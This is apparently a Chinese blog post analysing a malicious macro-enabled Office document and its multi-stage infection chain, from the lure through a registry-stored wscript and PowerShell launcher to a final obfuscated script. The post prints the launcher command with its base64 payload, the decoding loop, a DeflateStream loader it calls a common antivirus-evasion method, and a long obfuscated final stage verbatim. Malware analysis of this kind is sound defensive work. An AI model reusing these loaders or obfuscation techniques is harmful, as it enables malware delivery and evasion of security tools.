样本分析
投递手法-拥有历史传承的社工手法😁
文档打开后会通过模糊图片和文字欺骗受害者启用宏。宏代码运行后会弹出虚假的提示,表示“由于版本不兼容所以无法查看文档。”等:
宏
入口
宏代码的入口就可以发现这个攻击链有一些特殊,并不是所有代码都放在默认的位置一次性执行。先从入口的“Document_Open()”函数执行“UserForm2.Gladiator_CRK”,即控件“UserForm2”的“Gladiator_CRK”函数:
UserForm2.Gladiator_CRK
宏代码经过大量的编码转换,混淆,赋值替换处理:
看到这里,我已经眼皮一跳,这明显就是困难模式的前奏了。
运行后会在已有的控件UserForm1里面写入还原出的代码并执行:
UserForm1
这部分代码里主要有两大部分内容,一部分存放了Base64编码处理的数据:
还有一部分是执行数据方式的代码:
最后通过注册表写入的操作,用来调用Base64编码处理的数据,执行落地的数据:
注册表
注册表”HKEY_CURRENT_USER\Software\Classes\CLSID{769f9427-3cc6-4b62-be14-2a705115b7ab}\Shell\Manage\command”内创建了一个二进制字符串项,写入了大量的数据:
c:\windows\system32\wscript.exe /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""
其中“c:\windows\temp\icon.ico”的内容比较简单,为以隐藏方式执行参数:
CreateObject("Wscript.Shell").Run WScript.Arguments(0), 0, False
开头以wscript.exe(微软Microsoft Windows操作系统脚本相关支持程序)/E:vbs运行“icon.ico”内的数据。间接运行PowerShell,然后传入PowerShell所需执行的代码,这部分比较复杂:
- 调用“FromBase64String”Base64解码;
- 使用“ASCIIEncoding.GetString”方法解开十六进制转ASCII码的混淆。
解出来的代码内容为读取“%temp%\picture.jpg”的数据,进行和上面一样先Base64解码再将数字转ASCII码的处理,然后传入While循环进行处理:
PowerShell
第一层PowerShell
对数据进行Base64解码:
$XX=IEX(('[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((get-content -path ''c:\windows\temp\picture.jpg'')))'));$BB=IEX(('start-sleep 10;$s=$XX;$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);IEX([String]::Join('''',$d));;'));IEX($BB)
原本考虑写脚本,后面突然想到,可以将要运行的参数$BB输出!🤦♀️
第二层PowerShell
把代码改成这样,就可以将需要执行的参数,输出:
#获取“picture.jpg”$XX=IEX(('[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((get-content -path ''c:\windows\temp\picture.jpg'')))'));#保存$XX$XX > XX.txt#原:将$XX进行各种运算保存为$BB,执行#改为:将$XX进行各种运算保存为$BB,输出$BB=IEX(('$s=$XX;$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);#IEX([String]::Join('''',$d));;#去掉“IEX”不执行[String]::Join('''',$d);;'));$BB > B.txt
“picture.jpg”
CSDN有字数上线诶,数据放不了那么多我放语雀了,其实不重要
打印出的$BB为:
iex $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('(Base64数据)')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
除了Base64的编码外,头部为:
iex $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String
层层剥离,逻辑为:
- Base64解码:[Convert]::FromBase64String
- 以内存流的方式保存Base64解码的数据:$(New-Object IO.MemoryStream
- 解压内存流:$(New-Object IO.Compression.DeflateStream——到这一步时,我通过搜索,发现是算比较常见的PowerShell免杀方式
3.1 《长小亭 - 对PowerShell免杀脚本的分析》
3.2 《九八二一 - 关于Powershell免杀的探索》
3.3 【建议】《CS-Powershell免杀-过卡巴等杀软上线》
- 读取解压的内存流执行:iex $(New-Object IO.StreamReader
第三层PowerShell
把$BB执行结果使用out-file输出:
或者运行脚本使用(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('(Base64数据)')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd() | out-file outB.txt;
>将脚本结果重定向输出:.\B.ps1 > outB.txt
B.ps1脚本
得到: ```powershell sET WL0U3 ( TyPE ) ; ( -joiN (gEt-VAriAbLe Wl0u3 -vAl )::(“{1}{2}{0}” -f’ES’,’Ma’,’tch’).Invoke( “)’X’+]43[EMohsP$+]12[EMohsp$ ( .| )63]RAhC[,)221]RAhC[+65]RAhC[+87]RAhC[(eCalpER-43]RAhC[,’mPG’ eCalpER-93]RAhC[,)57]RAhC[+38]RAhC[+45]RAhC[+401]RAhC[( eCalpER- )’(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('(Base64数据)')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
) )69]rAHc[]GNiRTs[,)311]rAHc[+011]rAHc[+56]rAHc[((ECAlpEr.)93]rAHc[]GNiRTs[,KS6hKVyKS6h(ECAlpEr.)KS6hz8NKS6h,)021]rAHc[+57]rAHc[+25]rAHc[((ECAlpEr.))KS6hhSBN; } ECiztT+wUd,wUdvubGvu,GvuLeGvu) (weg{1}{0}weg-fGqh+GqhGvuGGvu,GvuUnGvu) ( weg ) )GvuR9YGvu,Gvue7NGvu(ECAlPER.)63]RA0Dk+0Dkhc[]gNiRTS[,GvuV1WGvu(ECAlPER.)43]RAhSO4,SO4Gqh+Gqh3wp,dwp6pzq.Length -gt 0){ f7x+f7OKP+Bt3+Bt3OKPxhdyDv,yDvhRV } catch { f7x+f7x hRV+hRVdGRU,GRU functiOKP+OKPhRV+hf7x+f7xRVon OKNfx,Nfx.( LatPsHoME[4]+LatPShOMe[34]+ilZXilZ) (((ilZ seT-KS6h,KS6haA,jaAt{1}{0}qjt -Fp9DiNgp9D,p9DStrp9D) ) ; &(qjt{0}{1}qjt -f p9Dsep9D,p9Dtp9D) (qjt{1}{0}qjt -f p9Dfjt+fjtkp9D,p9DBOZqp9D) ( qjt )p9Dxp9D+]5[CIlbUp:VneiXY+]31[CILBuP:vnEiXY (. Lwy )43]RAhC[,)121]RAhC[+35]RAhC[+211]RAhC[( eCaLpeRc- 421]RAhC[,p9DGi9p9DeCaLpeRc-93]RAhC[,)35]RAhC[+801]RAhC[+411]RAhC[(eCaLpeilZ+ilZRc- )p9D
)5lr5lrNIoJ-]2,11,3[Eman.)5lrrdm5lr Vg((. Gi9)93]rahC[]GNiRTs[,)17]rahC[+311]rahC[+401v8C+v8C]rahC[((EcALpER.)421]rahC[]GNiRTs[,5lrNqd5lr(EcAwUd,wUd}{11}{20}{7}{28}{1}{2Ri+2RJl4+Jl4i0}{4}{18}{9}{5}{19}{p9D+p9D14}{17}{22}{21}{15}{2}{16}{27}{6}{8}{26}{10}{13}{3}{24}{25}{12}j3N-f WNLg Lo6qngn = PbzcerffPbqr(Lo6qngnf7x+f7x)hRV1nR,1nRredentials = dwp,dwpN0JykpOKP+OKPDQoJew0KCQkkZOKP+OKPSf7x+f7x5OKP+OKPDb21tYW5kU2Nydwp,dwpgU3lzdGVtLklPLkNvbXdv8C+v8Cwp,dwp OKP+OKP } v8C+v8C caf7x+f7xtch{ OJl4+Jl4KP+OKP return Lo6_.Exception.Mesf7x+f7xsage }
}
funcGRU,GRUyr = [System.S3Yp+3Ypecurf7x+f7xity.dwp0ni,0nJInJ50+nJ50v,JIvKP+OKPxAr]5fN3w+N3w7x+f7x7+[CHAr]74),[CHArf7x+f7x]96OKP+OKP-rePLacE hRVLo6hRV,[CHAr]36 -cREPlAfjt+fjtCE hRVaZDhRVOKP+OKP,OKP+OKg5u+g5uP[CHAr]dwp,dwptem.NeNfx,Nfx6dl7Sa,l7Sa+ztTXhRV) dwp,dwpm.Net.WebRequesdJl4+Jl4wOKP+OKPp,0Dk+0Dkdwp+hRVyKS6h,KS6hNDC6+4n6f7xst LoWNLg,WNLg7}{210}{233}{2OKP+OKP12}{101jaA,jaAg5utT+ztTOKPfqh+fqh+OKPwpRV+hRVHJlYW0oJG1zLCBbU’+’3lzdGVf7x+OKP+OKPxXW+xXWf7xtLklPLkNvbXGvu+GvuByOKP+OKPZXNzaW9uilZ+ilZLkNvf7x+f7xbXByZXNzaW9uTW9kZV06OkNvdECi+ECAL2+AGqh+GqhL2iwp,dwp+hRdwp,dwpSBN:SBNaZD dwqH’+’,wqHMAPf f7x+f7x= Lo6vcwqH,wqHe(aZDb62Ri+2Rj1p+j1pi4 aZD,f7x+f7xaZDaOKP+OKPZD) f7x+f7x fWNLg,WNLgo62A1+2A1cevingr Lo6vaf7x+f7xshRV+hRdwp,dwp f7x+f7x5lr,5lra+hRVeif(Ldwp,dwpQi % {f7x+f7xLo6vcOKP+OKWMA+WwqH,wqHA1r52A1,2A182A1) -VaLuE) Yzt&(6SX{0}{1}6SX-f2A1I2A1,2A1EX2A1)
g51Yj+1Yju) -replACe ([chaR]88+[chaR]85+[chaR]51),[chaR]96 -replACe([chaR]89+[chaR]122+[chaR]116),[chaR]124-‘+’CREPlAcE ([chaR]54+[chaR]83+[chaR]88),[chaR]34-CREPlAcE ([4n6+4n6chaR]50+[chaR]65+[chaR]49),[chaR]39a4h+a4h) ) 0ni,0nibhg dwp,dwpPuBlIC[5f7x+f7x]+hRVztTl7Sa,l7Sax+f7xuf7x+f7xggcTRG OKP+OKPSBNdwp,BLT+BLTdwpBNdataSBN:SBNaZD + Lo6vasb OKP+OKP+ aZDSBN}aZDKVy+KVy) g5u+g5u f7x+f7xOKP+OKP Lo6vasb 3Yp+3Yp= PbzcerffPbqr(Lo6vasb) AL2+AL2 f7x+f7x Lo6vasb = uggcCBFG (SBN/NoneSBNwqHv8C+v8C,p9D+p9DwqHREpLaCE(YrnaZOYrn,[STRInG][chAR]34).REpLaCE(([chKS6h,KS6h } 1nR))-rEpLACe([cHar]48+[cHar]50+[cHar]78),[cHar]36 -KVy+KVyrEpLACe1nRRxY1nR,[cHar]39 -cREpLaCE1nRHEx1n4n6+4n6R,[cHarYKV,YKVm57REv{B0g]4n6+4n6GnirTS[( (.; ) )ztTXEgztp9D+p9DT,ztTerztxXW+xXWTF-D0w}1{}0{D0w(]EPyt[ ( )ztTKaztT+ztTch7+ch7LztTg5uvt95+vt95+g5uGqh+GqnJ50+nJ50h+ztT76eztT+ztT:ELBztT+ztTaiRAvzGqh+GqhtT( )ztTsztT,ztTi-tEztT,ztTmETztTf-D0w}0{}1{0Dk+0Dk}2{D0w(&Bt3(( ()Bt3Bt3nIoJ-Bt3XBt3+]3,1[)(gNiRtsot.EcNEreFErpesohND,hNDxYbG1Yj+1Yj1RxY,RxY02NRxY).rePlACE(RxYHUhRxY,[StSO4,SO4m7n8+m7n87x+f7xworkAdapterConfiguOKP+OKPratiOKch7+ch7P+OKPon -FilOKP+OKPter SBNIPfqh+fqhEnabled=TrueSBN mQf7x+f7xi Wherm7n8+m7n8e{Lo6_.IPAddressdwf7x+f7xp,dwp_nadwp,dOKP+OKg5u+g5uPwpef7x+f7xrfhygOKP+OKP = SBNNULLSBN dwp,dwp
function Pbzf7x+f7xcerffPbqr ([OKP+OKPString]dwp,dwpvfNqzva hRV+hRV Lo6FlfVasb 0ni,0ni )ECi
SO4,SO4[( ecalPeR- )Bt3
)) ztTztT nIoJ- ))ztTelztT,ztTOTthgIztT,z2AnJ50+nJ501+2A1tTtFztT,ztTrztT f- D0w}1{}3{AL2+AL2}2{}0{D0w(, ztT.ztT,D0wIEx ( ((ztT. ( fQWenV:co2Ri+2RiMsPEc[4,15,25]-JoiN1nR1nR)(((vt95+vt95(wqH,wqH
))4n6fi54n6,)84]RaHc[+911]RaHc[+001]RaHc[((ECAlpEr.)43]RaHc[]gnirTs[,4n64bM4n6(ECAlpEr.)6BLT+BLT9]RaHc[]gnirTs[,)411]RaHc[+38]RaHc[+57fqh+fqh]RaHc[((ECAlKVy+KVypEr.)63]RaHc[]gnirTs[,)75]RaHc[+18]RaHc[+101]RaHc[((ECAlpEr.)93]RaHc[]gcTw+cTwnicTw+cTwfqh+fqhrTs[,4n6a4h4n6(ECAlpEr.)4n6
)a4h1Yj+1YjXa4h+]43[}emohrSKSp{9Qe+]12[}eMrSKO’+’hSp{9Qe ( & 0wd 4bM )a4h a4h a4m7n8+m7n8hSFo:ElBairaVa4h meti-TES(9Qe4bM+ ) }}_{9Qe { )a4h%a4h(& 0wd ) a4hta4h+)a4htHa4h,a4hfeLOta4h f-4bM}0{}1{4bM(+a4hGa4h+a4hira4h, a4h.a4h ,4bM . ( 9QeVeRBOsePreFErenCe.tnJ50+nJ50ostRing()[1,3]+a4hXa4h-JJl4+Jl4oiNa4ha4h) ((a4h ((tkyV{22}{5}{0}{16}{1}{9}{8}{21}{1m7n8+m7n81}{3}{14}{13}{7}{18}{15}{19}{17}{20}{6}{12}{10}{23}{2}{4}tky5SO4,SO4+ztT+f7x OKP+OKP New-I5lrvt95+vt95,5lr } dwp,dwp [SysO1KS6h,KS6hLAce([ChAr]74+[1Yj+1YjChAr]108+[ChAr]52),[ChAr]39) 8fj.( xAsSHELlid[1]+xAsSHElLId[13]+jaAXjaA) v8m7n8+m7n8C).rEplAcE(([CHaR]56+[CHaR]102+[CHaRfqh+fqh]106),v8CVZ8v8C).rEplAcE(([CHaR]120+[CHaR]65+[CHaR]115),[sTRING][CHaR]36).rEplAcE(v8Cm9Nv8C,[sTRING][CHaR]34).rEplAcE(v8CjaAv8’+’C,[sTRING][CHaR]39) VZ8. ( pgmpsHome[21]+pgmpsHome[30]+v8CXv8vt95+vt95C)mCKVy+KVyz (ekovnI.)v8CEHCTv8C,v8Csv8wUd,wUd (N3w a9E{m1EQzUy} = tYPe ; &(Zv4{1}{0}Zv4 -fxXWeTxXW,xXWSxXW) (Zv4{0}{2}{1}Zv4 -f xXWixXW,x’+’XW28xXW,xXWrpHxXW) ([ChAr[] ]Zv4) )93]rAHc[,)401]rAHc[+87]rAHc[+86]rAHc[( EcALPerc- 63]rAHc[,)78]rAHc[+98]rAHc[+77]rAHc[(eCAlpeR-421]rAHc[,xXWyMCxXWEcALPerc- 43]rAHc[,)45]rAHc[+78]rAHc[+35]rAHc[(eCAlpeR-)xXW
)hNDXhND+]03[emOHSPWYM+]12[eMohsPWYM (&yMC )93]RaHc[]gnirtS[,hND1YjhND(EcaLper.)hNDyMChND,)801]RaHc[+201]RaHc[+901]RaHc[((EcaLper.))hND6ahz = [inf7x+fWNLg,WNLg]+0nix0niP9r+P9r-join0ni0ni) Yrn).REpLaCE(([chAR]84+[chvt95+vt95AR]55+[chAR]104),Yrns5eSO4,SO4]::Create(LhRf7x+f7xV+hRVof7x+f7x6hey)j1p+j1p; l7Sa,l7SaECi,ECibleECi,E0Dk+0DkCivAriECi) (tDr{0}{1}tDr -f ECigcTw+cTw4ECi,cTw+cTwEChND,hND64}{76}{253}{Yrn+Yrn77}{15j1p+j1p2OKP+OKP}{120}{111}{159}{157}{196}{261}{37}{70}{245}{251}{73}{260Dk+0Dkj1p+j1p5}{153}{1OKP+OKP2}{155}{230}{169}{257}{82}{94OKP+OKP}{78}{97}{218}{146}{46}{172}{Jd3+JdWMA+WMA3232}{174}{45}{41}{250}{71}{177}{35}0ni,0niRV Lo6FlfVasb +2A1+2A1= SBNWNLg,WNLg6zlneenlnJ50+nJ50 +=OKPECi+ECi+OKP Lodwp,dwpbReqf7x+f7xuestSO4,SO4nR,KVy+KVy1nRD5CryptoService1nR,1nR+hRVKS6h,KS6hTriNg][ChAr]KVy+KVy34).rEpLaCE(j1pNfxj1p,[sTriNg][CwUd,wUd& ; ) )vt95gnivt95,vt95rtSvt95F- NFOg}1{}0{NFOg(]Epyt[ ( )vt95ivt95,vt95rAVvt95,vt95RENp:ELBvt95,vt95Avt95,vt95Fvt95 f- NFOg}0{}2{}1{}4{}3{NFOg( )vt95Esvt95,vt95MeTI-tvt9’+’5f-NFOg}0{}1{NFOg(& ; hND,hND12{}11{}91{}21{}3{}2{}4{}0{}7{}32{}22{}71{}01{}81{}31{}0fqh+fqh2{}6{}42{}1{}9{}5{}52{}8{lAe((fjt(lwJ; ( vARiabLE (fjtwJsfjt+fjtTxNfjt) -VQOM+QOMAlUeoNlilZ+ilZy )::(lwJ{1}{0}{2}lwJ -f fjtevefjt,fjtrfjt,fjtRSEfjt).Invoke( huz{1ZiWuZNTfR} );&( ([STrInG]huz{vEZiWuRZiWuBOsEpREZiWuFeRZiWuenCe})[1,3]+fjtXfjt-joiNfjtfjt) (huz{1ZNZiWuTFR} -jOiN fjtfjt)
Jl4) -CREPlAcE([cHAr]90+[cHAr]105+[cHAr]87+[cHAr]117),[cHAr]96 -CREPlAcE([cHAr]102+[cHAr]106+[cHAr]116),[cHAr]39 -REPlACE Jl4huzJl4,[cHAr]36-CREPlAcE Jl4fWFJl4,[cHAr]124 -REPlACE([cHAr]108+[cHAr]119+[cHAr]74),[cHAr]34) ) jaA,jaAX{1}{0}6SX-f1Yj+1Yj2nJ50’+’+nJ50A1582A1,2A1r2A1) ( [char[]] 6SX)2A12A1nIOJ-]2,11,3[emAn.)cTw+v8C+v8CcTw2A1Rdm2A1 vg((. YzwUd,wUd4hl7Saa4h,[StRING][cHaR]39).rEpLaCE(([cHaR]87+[cHaR]73+[cHaR]55),a4h9Qep9D+p9Da4h))4bM (ekovnyDv)).rEPLaCE(yDvQOMyDv,[sTrING][ChAR]39).rEPLaCE(([ChAR]70+[ChAR]76+[ChAR]111),[sTrING][ChAR]96).rEPLaCE(yD’+’vmYUyDv,[sTrING][ChAR]124) KVy+KVy) 1Yj+1Yj vnJ50+nJ50t95).REplAcE(([CHar]121+[CHar]68+[CHar]118),[STRINg][CHar]39).REplAcE(vt1Yj+1Yj9’+’5zEpvt95,[STRINg][CHar]36).REplAcE(vt95fRqvt95,[STRINhND,hNDr)) cTw+cTw OKP+OKPhRV+hRV{ f7hND,hND((ECAlPer.))JIv+f7x,dwpader] LoGvu+Gvu6erOKP+OKPdwp,dwpXBhRV+hRVTdhdwf7ch7+ch7x+f7xp,dwp f7OKP+OKPx+f7x= cmd /c Lo6pzq OKP+OKP Lof7x+f7x6bhg f7x+f7x=b4B,b4B+hRV.Substring(Lo6f7x+f7xhRV+hRVwUd,wUd0Dk+0Dk7x+f7x fqh+fqhhRf7x+f7xV+hRVLf7x+f7xo6tf7x+f7x = yDv,yDv }hRV+hROKP+OKPV YKV,YKV9{y5p(j1p+j1p(p9D(( qjt ) ;wUd,wUdztT+ECi} OKP+OKPfjt+fjt
f0Dk+0Dk7x+f7WNLg,WNLgystemJd3+Jd3.Net.Wdwp,dwpwnOKP+OKPldw3Yp+3Ypp,dwp }
}
fqh+fqh OKP+OKPelseif(Lo6pzq.Nfx,NfxP9r,P9raBPJl4+Jl49r) ( [cHAr[ ] ] jyb ))43]RAhC[,)57]RAhC[vt95+vt95+89]RASO4,SO4VeRbOSEprEFeReNce.toStrIng()[1,3WNLg,WNLgOKP+OKPhND,hwUd,wUdP}3{uOY(& ;) ) AV- )f7xLf7x,f7x0vf7xf- ECi+ECiuOY}1{}0{uOYRxY+RxYYKV,YKV m7n8+m7n8 } catdwp,dwpponGqh+GqhseStream()P9r+P9r;dwp,dwpch {
xXW+xXW return OKP+OKPSBNSBN
RxY4n6+4n6+RxYhRVdwp,djaA,jaA [Net.CredentialCache]::DefaultCrOKP+OKPedentialf7x+f7OKP+OKPxs
KS6h,KS6hiTEM vaRiablE:zWr0d ( TyPE ) ; ( Jj3{zwR0d}::(wh5{0}{2}{1}wh5-fch7mach7,ch7Hesch7,ch7tCch7).Invoke(wh5xEintP)63]rAHCN3w+N3w[,)811]rAHxXW+xXWC[+701]rAHC[+75]rAHC[(ECalPer- 43]rAHC[,)76]rAHC[+77]rAHC[+37]rAHC[( ecALpeRC-93]rAHC[,)89]rAHC[+25]rN3w+N3’+’wAHC[+66]rAHC[( eSO4,SO4))421]raHc[,OZcn0KOZc ECAlPerC- 93]raHc[,)97]raHc[+57j1p+j1p]raHN3w+N3wc[+08]raHc[( ECaLper-2Ri+2Ri 63]raHc[,)57]raHc[+311]raHc[nJ50+nJ50+28]raHc[( EBJK,BJK29fyDv,yDv Lo6xrl, cTw+cTwLo6n = Lo6pf7x+f7xk;
dwp,dwpetdwp)).REPlace(dwphRVN3w+N3wdwp,[sf7x+f7xTRInWMA+WMAG][Char]39).Rf7xch7+ch7+f7xEf7x+f7xPlace(dwp06udf7x+f7xwp,dwpTw2dwp).REP’+’lace(OKP+OKPdwf7x+f7xpQuOdwp,[sTRInG][Char]36) Tw2 &((get-VariAblE dwpmdRdwp).nAMe[33Yp+3Yp,11,2]-JxXW+xXWoIndwpdwp)
f7x).RepLACe(nJ50+nJ50f7xTw2OKP+OKPf7x,[stRiNG][chaR]124).ROKP+OKPepLACe(f7OKP+OKPxknSf7x,fjt+fjt[stRiNG][chaR]344n6+4np9D+p9D6).RepLBLT+BLTACeN3w+N3w(f7xdwpf7x,[stRRxBJK,BJWNLg,WNLgxdwpf7Op9D+p9DKP+OKPx+f7x,a4h+a4hdwpVf7x+f7x+hRVCOGvu+GvuKP+OKPII.G2Ri+2RietStBt3+Bt3rhND,hND+hRV f7x+f7xreturn SBNErrorHJl4+Jl4ostNameOKP+OKPSBN;
}
f7nJ50+nJ50x+f7x
dwp,dQOM+QOMwptrarengbe(Lo6fgf7YKV,YKVDfMBoDfMsDfMEprEFErDfMvt95+vt95eNCe}.(weg’+’{0}{1}{2}weg-f Gv4n6+4n6uToGvu,GvuStrGvu,GvuinGGvu).Invoke()[1,3]+GvuXGvu-joiNGvuGvu) (-JOiN( &(nJ50+nJ50weg{1}{0}weg -fGvuiABleGvu,GvuVaRGvu) (weg{0}{1}weg-fGvuuGvu,GvuNGj1p+j1pGvu) ).wegvDfMALUEweg[ -1 .. -( ( &(nJ50+nJ50weg{1}{2}{0}weg-fGvuleGvu,GvuVaRiGvu,GvuABGvu) (weg{1}{0}weg-f jaA,jaAYrn+Yfqh+fqhrn
AL2+AL2yDv,yDvwp,dwpLf7x+f7xe4n6+4n6ngth -gt 0){
1Yj+1Yj Lo6ehRV+hRVrf7x+fOKP+OKP7xd_fgernz = Lo6jroerd.GetRequestSBLT+BLTtredf7x+f7xwp,dwf7x+f7xOKP+OKPp Lo6JvaqbjfgjaA,jaA+f7x BJK,BJK
nJ50+nJ50)Jd3Jd3nJ50+nJ50nIoJ-]52,42,4[cEpsmoC:VnE0os ( &kvq)63v8C+v8C]raHC[,Jda4h+a4h3s5eJd3 eCaLpeR- 421]raHC[,Jd3ImfJd3 EcAlPErC- 93]raHC[,)9m7n8+m7n88]raHC[+411]raHC[+01Gvu+jaA,jaAi+ECiQogICAgdwp,OKP+OKPdwp Lo6FlfVasb hRV+hROKP+OKPV+= ShRV+hRVBN**Sch7+ch7BNf7x+f7x WMA+WMA2RiKVy+KVy+2Ri OKP+OKP ch7+ch7LAL2+AL2o6hRV+hRVFlfOKP+OKYrn+YrnPVasb +=dwAL2+A0Dk+0DkL2p,dwpkU2Nyf7x+xXW+xXWf7xaXB0QmxvY2sgfwUd,wUdJIv,JIv6pzdwYKV,j1p+j1pYKV System.IOKP+OKPO.StreWMA+WMAamReader LOZc,OZcRV+hRVCglpZigkYy5TdGFydHNf7x+f7xXhRVfqh+fqh+hRVaXRoKCdXcml0ZS1Ib3N0Jdwp,dwping Lo6undwp,dwp f7x+f70ni,0niP+O4n6+4n6KPx+f7xmf7x+f7xObject Scripting.FileSystdwp,dwphRVe2A1+2A1ct Win3hRV+hRV2_Opehvt95+vt95RV+hRVrhRV+hRVathRch7+ch7V+hRVinOKP+OKPgp9D+’+’p9DSf7x+f7xystem).Nadwp,dwpoadf7x+f7xv8C+v8CFilev8C+v8C(LhRV+hRVo6dwp,dch7+ch7wpo61Yj+1Yjeaf7x+f7xq = Gdf7x+f7a4h+a4hxwp,dwOKP+OKPpbmddJG1dwp,dwJd3+Jd3pN 4n6+4n6+ Lo6pzqhRVb4B,b4B,dwp){ f7x+f7x tOKP+OKPry { LhROKP+OKPV+hO0Dk+0DkKP+OKPRVo6f7x+f7xjrf7x+fp9D+p9D7xoerd = [f7x+f7xSWNLgm7n8+m7n8,WNLgyDv,yDvpzq = LhRVOKP+OKP+hRVo6pzdwp,dhND,hNDPx0Dk+0Dk+f7x2}{1WNLg,WNLghRjaA,jaAGvuNGGvu,GvuuGvu) ).wegvDfMAluEweg.weglDfMenGTHweg)] )
WMA) -cRepLACe([chAR]118+[chAR]66+[chAR]75),[chAR]36 -REpLaj1p+jyDv,yDv (QOM &(Cq5{1}{3}{0}{2}Cq5 -f m7n8iabN3w+N3wm7n8,m7n8SEt-m7n8,m7n8lEm7n8,m7n8VARm7n8) (Cq5{1}{0}Cq5-fm7n8cm7n8,m7n8q7m7n8) (tyPe ); &(m7n8svm7nvt95+vt958) (Cq5{0}{1}Cq5 -f m7n84m7n8hND,hND132}{209}{81}{42}f7x+f7x{228}{32}{31}{189}{236}{113}{2f7x+f7x9p9D+p9D}{229OKP+OKP}OKP+OKP{1j1p+j1p80}{109}{248}{f7x+f7x107}{17OKP+OKP3}{1j1p+j1p40}{206}{51nR,1nR(RxY&(tDr{1}{0}tDr -fECiETECi,ECisECi) (tDr{1}{0}tDr -fECiEECi,ECig48ECi) ( tDr)ECiECiNioj-]2,11,3[eMan.)ECirDmECi ELbairav-tEG((WMA+vt95+vt95WMA. hOG )63]RAHc[,ECiGkfECi EwUd,wUdOKP hRdwp,WNLg,WNLg OKP+OKP OKP+OKPif (Lo6erfc -ne dwp,dwpimOKP+OKPumwqH,wqHROKP+OKPesponseStream(); OKP+OKP [System.f7x+f7xIO.StreamReadeOKP+OKPr] dwp,dwpt]:GRUf-6Fz}02{}7{}51{}41{}01{}0{}81{}22{}61{}11{}6{}52{}12QOM+QOM{}91{}b4B,b4B.Wef7ECi+ECix+N3w+N3wf7xbRequest]::GetSystehRV+hRVmWebhRVOJl4+Jl4KP+OKP+OKP+OKPhRVf7x+f7xProxy(f7x+OZc,OZc
)OKPhND,hNDindwpf7x+fOKP+OKP7x,dwp.WiOZcjaA,jaA . ( iMypSHoME[4]+iMyPsHOME[34]+Jl4xJl4) (((Jvt95+vt95l4seT (fjtWJSfjt+fjttXNfjt) ( tYpeztTctamztT,ztTsEhztT f- D0w}0{3Yp+3Yp}1{D0w(::euLaV.))ztTKAztT+ztTLztT+ztT76eztT+ztT:elbztT+ztTAIrAVBt3+Bt3ztT( )ztTmEtztT,ztTiztWMA+xXW+xXWWMATf-D0wYrn+Yrn}1{}0{D0w(& ( (( ‘+’)ztTzhND,hNDn8VaRim7n8) ).Cq5vALgJ3UECq5[-1 ..-( (&(m7n8LSm7n8) (Cq5{0}{3}{2}{1}Cq5 -fm7n8VaRiAblm7n8,m7n8t3Lm7n8,m7n8Fm7n8,m7n8E:4m7n8) ).Cq5vgJ3ALUECq5.Cq5LENgJ3GtHCq5 )] )ka1i. ( 7Szo{egJ3NV:pugJ3BgJ3lic}[13]+7Szo{EngJ3V:PUBlgJ3iC}[5]+m7n8Xm7n8)
